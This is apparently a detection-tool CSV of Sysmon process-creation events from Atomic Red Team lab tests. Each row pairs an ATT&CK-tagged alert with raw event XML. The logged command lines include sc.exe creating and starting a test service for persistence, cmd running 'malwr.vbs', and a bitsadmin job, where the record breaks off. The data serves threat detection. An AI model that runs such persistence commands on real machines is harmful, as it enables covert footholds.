<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547449.278042,2019-07-19T18:44:09.278042+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe delete AtomicTestService&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:09.253714Z"">
</TimeCreated>
<EventRecordID>3585</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:44:09.225</Data>
<Data Name=""ProcessGuid"">747F3D96-D739-5D31-0000-0010E4BB2600</Data>
<Data Name=""ProcessId"">4744</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe delete AtomicTestService&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547449.17604,2019-07-19T18:44:09.176040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe stop AtomicTestService&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:09.150760Z"">
</TimeCreated>
<EventRecordID>3583</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:44:09.142</Data>
<Data Name=""ProcessGuid"">747F3D96-D739-5D31-0000-00104CB72600</Data>
<Data Name=""ProcessId"">5000</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe stop AtomicTestService&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1543 ] Sc.exe manipulating windows services,1563547448.307214,2019-07-19T18:44:08.307214+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services usign Sc.exe with Command Line (sc.exe start AtomicTestService) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe start AtomicTestService&quot;) in directory : ( C:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:08.288861Z"">
</TimeCreated>
<EventRecordID>3581</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Persistence or Exec - Services Management</Data>
<Data Name=""UtcTime"">2019-07-19 14:44:08.269</Data>
<Data Name=""ProcessGuid"">747F3D96-D738-5D31-0000-0010D8AA2600</Data>
<Data Name=""ProcessId"">4260</Data>
<Data Name=""Image"">C:\Windows\System32\sc.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Service Control Manager Configuration Tool</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">sc.exe start AtomicTestService</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D738-5D31-0000-001056A62600</Data>
<Data Name=""ParentProcessId"">2556</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe start AtomicTestService&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547448.288861,2019-07-19T18:44:08.288861+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe start AtomicTestService&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:08.268803Z"">
</TimeCreated>
<EventRecordID>3580</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:44:08.227</Data>
<Data Name=""ProcessGuid"">747F3D96-D738-5D31-0000-001056A62600</Data>
<Data Name=""ProcessId"">2556</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe start AtomicTestService&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1543 ] Sc.exe manipulating windows services,1563547448.221461,2019-07-19T18:44:08.221461+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services usign Sc.exe with Command Line (sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe&quot;) in directory : ( C:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:08.185344Z"">
</TimeCreated>
<EventRecordID>3577</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Persistence or Exec - Services Management</Data>
<Data Name=""UtcTime"">2019-07-19 14:44:08.181</Data>
<Data Name=""ProcessGuid"">747F3D96-D738-5D31-0000-001098A22600</Data>
<Data Name=""ProcessId"">1700</Data>
<Data Name=""Image"">C:\Windows\System32\sc.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Service Control Manager Configuration Tool</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D738-5D31-0000-001046A02600</Data>
<Data Name=""ParentProcessId"">4216</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547448.185344,2019-07-19T18:44:08.185344+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:08.161838Z"">
</TimeCreated>
<EventRecordID>3576</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:44:08.146</Data>
<Data Name=""ProcessGuid"">747F3D96-D738-5D31-0000-001046A02600</Data>
<Data Name=""ProcessId"">4216</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553031677.339046,2019-03-20T01:41:17.339046+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T21:41:17.339046Z"">
</TimeCreated>
<EventRecordID>1966563</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 21:41:17.288</Data>
<Data Name=""ProcessGuid"">365ABB72-61FD-5C91-0000-0010536A1200</Data>
<Data Name=""ProcessId"">2340</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.EXE /c malwr.vbs</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-528D-5C91-0000-001062560000</Data>
<Data Name=""ParentProcessId"">484</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot;) in directory : ( c:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:43:03.303217Z"">
</TimeCreated>
<EventRecordID>3574</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:43:03.271</Data>
<Data Name=""ProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ProcessId"">3912</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell</Data>
<Data Name=""CurrentDirectory"">c:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6ED-5D31-0000-0010C88A2500</Data>
<Data Name=""ParentProcessId"">3764</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:43:03.303217Z"">
</TimeCreated>
<EventRecordID>3574</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:43:03.271</Data>
<Data Name=""ProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ProcessId"">3912</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell</Data>
<Data Name=""CurrentDirectory"">c:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6ED-5D31-0000-0010C88A2500</Data>
<Data Name=""ParentProcessId"">3764</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547383.303217,2019-07-19T18:43:03.303217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:42:53.295578Z"">
</TimeCreated>
<EventRecordID>3573</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:42:53.277</Data>
<Data Name=""ProcessGuid"">747F3D96-D6ED-5D31-0000-0010C88A2500</Data>
<Data Name=""ProcessId"">3764</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D4B8-5D31-0000-0010A8CE0600</Data>
<Data Name=""ParentProcessId"">4416</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547710.660877,2019-07-19T18:48:30.660877+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /create AtomicBITS&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:30.640915Z"">
</TimeCreated>
<EventRecordID>3657</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
